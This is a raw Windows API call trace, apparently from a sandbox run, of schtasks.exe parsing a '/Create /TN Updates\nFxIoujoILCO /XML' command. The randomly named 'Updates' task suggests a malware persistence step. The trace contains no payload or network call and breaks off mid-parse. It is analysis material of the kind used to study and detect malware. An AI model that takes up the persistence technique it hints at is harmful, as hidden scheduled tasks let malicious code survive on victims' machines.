[0154.029] GetProcessHeap () returned 0x280000
[0154.029] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x296a58) returned 0x64
[0154.030] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296a58 | out: hHeap=0x280000) returned 1
[0154.030] GetProcessHeap () returned 0x280000
[0154.030] GetProcessHeap () returned 0x280000
[0154.030] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2953e0) returned 1
[0154.030] GetProcessHeap () returned 0x280000
[0154.030] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2953e0) returned 0x14
[0154.030] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2953e0 | out: hHeap=0x280000) returned 1
[0154.030] GetProcessHeap () returned 0x280000
[0154.030] GetProcessHeap () returned 0x280000
[0154.030] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x28f0a0) returned 1
[0154.030] GetProcessHeap () returned 0x280000
[0154.030] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x28f0a0) returned 0x10
[0154.030] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x28f0a0 | out: hHeap=0x280000) returned 1
[0154.031] SetLastError (dwErrCode=0x0)
[0154.031] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0154.031] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0154.031] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0154.031] VerifyVersionInfoW (in: lpVersionInformation=0xdcaa4, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0xdcaa4) returned 1
[0154.031] SetLastError (dwErrCode=0x0)
[0154.031] lstrlenW (lpString="create") returned 6
[0154.031] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0
[0154.031] SetLastError (dwErrCode=0x490)
[0154.031] SetLastError (dwErrCode=0x0)
[0154.031] lstrlenW (lpString="create") returned 6
[0154.031] GetProcessHeap () returned 0x280000
[0154.031] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2953e0
[0154.031] GetProcessHeap () returned 0x280000
[0154.031] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x28f0a0
[0154.031] _memicmp (_Buf1=0x28f0a0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.031] GetProcessHeap () returned 0x280000
[0154.031] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x16) returned 0x2953c0
[0154.031] SetLastError (dwErrCode=0x0)
[0154.032] _memicmp (_Buf1=0x294c50, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.032] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x295ac8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0154.032] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0154.032] GetProcessHeap () returned 0x280000
[0154.032] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x74e) returned 0x295cd8
[0154.032] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x295cd8 | out: lpData=0x295cd8) returned 1
[0154.032] VerQueryValueW (in: pBlock=0x295cd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdcbac, puLen=0xdcbb0 | out: lplpBuffer=0xdcbac*=0x296074, puLen=0xdcbb0) returned 1
[0154.032] _memicmp (_Buf1=0x294c50, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.032] _vsnwprintf (in: _Buffer=0x295ac8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdcb94 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0154.032] VerQueryValueW (in: pBlock=0x295cd8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdcbbc, puLen=0xdcbb8 | out: lplpBuffer=0xdcbbc*=0x295ea0, puLen=0xdcbb8) returned 1
[0154.032] lstrlenW (lpString="schtasks.exe") returned 12
[0154.032] lstrlenW (lpString="schtasks.exe") returned 12
[0154.033] lstrlenW (lpString=".EXE") returned 4
[0154.033] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0154.033] lstrlenW (lpString="schtasks.exe") returned 12
[0154.033] lstrlenW (lpString=".EXE") returned 4
[0154.033] lstrlenW (lpString="schtasks") returned 8
[0154.033] lstrlenW (lpString="/create") returned 7
[0154.033] _memicmp (_Buf1=0x294c50, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.033] _vsnwprintf (in: _Buffer=0x295ac8, _BufferCount=0x19, _Format="%s %s", _ArgList=0xdcb94 | out: _Buffer="schtasks /create") returned 16
[0154.033] _memicmp (_Buf1=0x294cb0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.033] GetProcessHeap () returned 0x280000
[0154.033] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2953a0
[0154.033] _memicmp (_Buf1=0x294cc8, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.033] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x296760, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0154.033] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0154.033] GetProcessHeap () returned 0x280000
[0154.033] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x30) returned 0x2969a0
[0154.033] _vsnwprintf (in: _Buffer=0x2966b8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdcb98 | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37
[0154.033] GetProcessHeap () returned 0x280000
[0154.033] GetProcessHeap () returned 0x280000
[0154.033] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295cd8) returned 1
[0154.033] GetProcessHeap () returned 0x280000
[0154.033] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295cd8) returned 0x74e
[0154.034] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295cd8 | out: hHeap=0x280000) returned 1
[0154.034] SetLastError (dwErrCode=0x0)
[0154.034] GetThreadLocale () returned 0x409
[0154.034] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.034] lstrlenW (lpString="create") returned 6
[0154.034] GetThreadLocale () returned 0x409
[0154.034] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.034] lstrlenW (lpString="?") returned 1
[0154.034] GetThreadLocale () returned 0x409
[0154.034] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.034] lstrlenW (lpString="s") returned 1
[0154.034] GetThreadLocale () returned 0x409
[0154.034] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.034] lstrlenW (lpString="u") returned 1
[0154.034] GetThreadLocale () returned 0x409
[0154.034] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.034] lstrlenW (lpString="p") returned 1
[0154.034] GetThreadLocale () returned 0x409
[0154.034] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.034] lstrlenW (lpString="ru") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="rp") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="sc") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="mo") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="d") returned 1
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="m") returned 1
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="i") returned 1
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="tn") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="tr") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="st") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="sd") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="ed") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="it") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="et") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="k") returned 1
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="du") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="ri") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="z") returned 1
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="f") returned 1
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="v1") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="xml") returned 3
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="ec") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.037] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.037] lstrlenW (lpString="rl") returned 2
[0154.037] GetThreadLocale () returned 0x409
[0154.037] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.037] lstrlenW (lpString="delay") returned 5
[0154.037] GetThreadLocale () returned 0x409
[0154.037] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.037] lstrlenW (lpString="np") returned 2
[0154.037] SetLastError (dwErrCode=0x0)
[0154.037] SetLastError (dwErrCode=0x0)
[0154.037] lstrlenW (lpString="/Create") returned 7
[0154.037] lstrlenW (lpString="-/") returned 2
[0154.037] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0154.037] lstrlenW (lpString="create") returned 6
[0154.037] lstrlenW (lpString="create") returned 6
[0154.037] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.037] lstrlenW (lpString="Create") returned 6
[0154.037] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.037] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|create|") returned 8
[0154.037] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|Create|") returned 8
[0154.037] lstrlenW (lpString="|create|") returned 8
[0154.037] lstrlenW (lpString="|Create|") returned 8
[0154.037] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0154.037] SetLastError (dwErrCode=0x0)
[0154.037] SetLastError (dwErrCode=0x0)
[0154.037] SetLastError (dwErrCode=0x0)
[0154.037] lstrlenW (lpString="/TN") returned 3
[0154.038] lstrlenW (lpString="-/") returned 2
[0154.038] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0154.038] lstrlenW (lpString="create") returned 6
[0154.038] lstrlenW (lpString="create") returned 6
[0154.038] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.038] lstrlenW (lpString="TN") returned 2
[0154.038] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.038] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|create|") returned 8
[0154.038] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.038] lstrlenW (lpString="|create|") returned 8
[0154.038] lstrlenW (lpString="|TN|") returned 4
[0154.038] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0154.038] SetLastError (dwErrCode=0x490)
[0154.038] lstrlenW (lpString="?") returned 1
[0154.038] lstrlenW (lpString="?") returned 1
[0154.038] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.038] lstrlenW (lpString="TN") returned 2
[0154.038] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.038] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|?|") returned 3
[0154.038] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.038] lstrlenW (lpString="|?|") returned 3
[0154.038] lstrlenW (lpString="|TN|") returned 4
[0154.038] SetLastError (dwErrCode=0x490)
[0154.038] lstrlenW (lpString="s") returned 1
[0154.038] lstrlenW (lpString="s") returned 1
[0154.038] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.038] lstrlenW (lpString="TN") returned 2
[0154.039] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.039] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|s|") returned 3
[0154.039] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.039] lstrlenW (lpString="|s|") returned 3
[0154.039] lstrlenW (lpString="|TN|") returned 4
[0154.039] SetLastError (dwErrCode=0x490)
[0154.039] lstrlenW (lpString="u") returned 1
[0154.039] lstrlenW (lpString="u") returned 1
[0154.039] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.039] lstrlenW (lpString="TN") returned 2
[0154.039] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.039] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|u|") returned 3
[0154.039] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.039] lstrlenW (lpString="|u|") returned 3
[0154.039] lstrlenW (lpString="|TN|") returned 4
[0154.039] SetLastError (dwErrCode=0x490)
[0154.039] lstrlenW (lpString="p") returned 1
[0154.039] lstrlenW (lpString="p") returned 1
[0154.039] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.039] lstrlenW (lpString="TN") returned 2
[0154.039] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.039] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|p|") returned 3
[0154.039] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.039] lstrlenW (lpString="|p|") returned 3
[0154.039] lstrlenW (lpString="|TN|") returned 4
[0154.039] SetLastError (dwErrCode=0x490)
[0154.039] lstrlenW (lpString="ru") returned 2
[0154.040] lstrlenW (lpString="ru") returned 2
[0154.040] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.040] lstrlenW (lpString="TN") returned 2
[0154.040] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.040] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|ru|") returned 4
[0154.040] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.040] lstrlenW (lpString="|ru|") returned 4
[0154.040] lstrlenW (lpString="|TN|") returned 4
[0154.040] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0
[0154.040] SetLastError (dwErrCode=0x490)
[0154.040] lstrlenW (lpString="rp") returned 2
[0154.040] lstrlenW (lpString="rp") returned 2
[0154.040] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.040] lstrlenW (lpString="TN") returned 2
[0154.040] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.040] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|rp|") returned 4
[0154.040] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.040] lstrlenW (lpString="|rp|") returned 4
[0154.040] lstrlenW (lpString="|TN|") returned 4
[0154.040] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0
[0154.040] SetLastError (dwErrCode=0x490)
[0154.040] lstrlenW (lpString="sc") returned 2
[0154.040] lstrlenW (lpString="sc") returned 2
[0154.040] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.040] lstrlenW (lpString="TN") returned 2
[0154.040] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.041] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|sc|") returned 4
[0154.041] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.041] lstrlenW (lpString="|sc|") returned 4
[0154.041] lstrlenW (lpString="|TN|") returned 4
[0154.041] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0
[0154.041] SetLastError (dwErrCode=0x490)
[0154.041] lstrlenW (lpString="mo") returned 2
[0154.041] lstrlenW (lpString="mo") returned 2
[0154.041] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.041] lstrlenW (lpString="TN") returned 2
[0154.041] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.041] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|mo|") returned 4
[0154.041] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.041] lstrlenW (lpString="|mo|") returned 4
[0154.041] lstrlenW (lpString="|TN|") returned 4
[0154.041] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0
[0154.041] SetLastError (dwErrCode=0x490)
[0154.041] lstrlenW (lpString="d") returned 1
[0154.041] lstrlenW (lpString="d") returned 1
[0154.041] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.041] lstrlenW (lpString="TN") returned 2
[0154.041] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.042] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|d|") returned 3
[0154.042] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.042] lstrlenW (lpString="|d|") returned 3
[0154.042] lstrlenW (lpString="|TN|") returned 4
[0154.042] SetLastError (dwErrCode=0x490)
[0154.042] lstrlenW (lpString="m") returned 1
[0154.042] lstrlenW (lpString="m") returned 1
[0154.042] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.042] lstrlenW (lpString="TN") returned 2
[0154.042] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.042] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|m|") returned 3
[0154.042] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.042] lstrlenW (lpString="|m|") returned 3
[0154.042] lstrlenW (lpString="|TN|") returned 4
[0154.042] SetLastError (dwErrCode=0x490)
[0154.042] lstrlenW (lpString="i") returned 1
[0154.042] lstrlenW (lpString="i") returned 1
[0154.042] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.042] lstrlenW (lpString="TN") returned 2
[0154.042] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.042] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|i|") returned 3
[0154.042] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.042] lstrlenW (lpString="|i|") returned 3
[0154.042] lstrlenW (lpString="|TN|") returned 4
[0154.042] SetLastError (dwErrCode=0x490)
[0154.043] lstrlenW (lpString="tn") returned 2
[0154.043] lstrlenW (lpString="tn") returned 2
[0154.043] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.043] lstrlenW (lpString="TN") returned 2
[0154.043] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.043] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|tn|") returned 4
[0154.043] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.043] lstrlenW (lpString="|tn|") returned 4
[0154.043] lstrlenW (lpString="|TN|") returned 4
[0154.043] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|"
[0154.043] SetLastError (dwErrCode=0x0)
[0154.043] SetLastError (dwErrCode=0x0)
[0154.043] lstrlenW (lpString="Updates\\nFxIoujoILCO") returned 20
[0154.043] lstrlenW (lpString="-/") returned 2
[0154.043] StrChrIW (lpStart="-/", wMatch=0x55) returned 0x0
[0154.043] SetLastError (dwErrCode=0x490)
[0154.043] SetLastError (dwErrCode=0x490)
[0154.043] SetLastError (dwErrCode=0x0)
[0154.043] lstrlenW (lpString="Updates\\nFxIoujoILCO") returned 20
[0154.043] StrChrIW (lpStart="Updates\\nFxIoujoILCO", wMatch=0x3a) returned 0x0
[0154.043] SetLastError (dwErrCode=0x490)
[0154.043] SetLastError (dwErrCode=0x0)
[0154.043] lstrlenW (lpString="Updates\\nFxIoujoILCO") returned 20
[0154.043] SetLastError (dwErrCode=0x0)
[0154.043] SetLastError (dwErrCode=0x0)
[0154.043] lstrlenW (lpString="/XML") returned 4
[0154.043] lstrlenW (lpString="-/") returned 2
[0154.043] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0154.043] lstrlenW (lpString="create") returned 6
[0154.044] lstrlenW (lpString="create") returned 6
[0154.044] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.044] lstrlenW (lpString="XML") returned 3
[0154.044] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.044] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|create|") returned 8
[0154.044] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.044] lstrlenW (lpString="|create|") returned 8
[0154.044] lstrlenW (lpString="|XML|") returned 5
[0154.044] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0154.044] SetLastError (dwErrCode=0x490)
[0154.044] lstrlenW (lpString="?") returned 1
[0154.044] lstrlenW (lpString="?") returned 1
[0154.044] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.044] lstrlenW (lpString="XML") returned 3
[0154.044] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.044] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|?|") returned 3
[0154.044] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.044] lstrlenW (lpString="|?|") returned 3
[0154.044] lstrlenW (lpString="|XML|") returned 5
[0154.044] SetLastError (dwErrCode=0x490)
[0154.044] lstrlenW (lpString="s") returned 1
[0154.044] lstrlenW (lpString="s") returned 1
[0154.044] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.044] lstrlenW (lpString="XML") returned 3
[0154.044] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
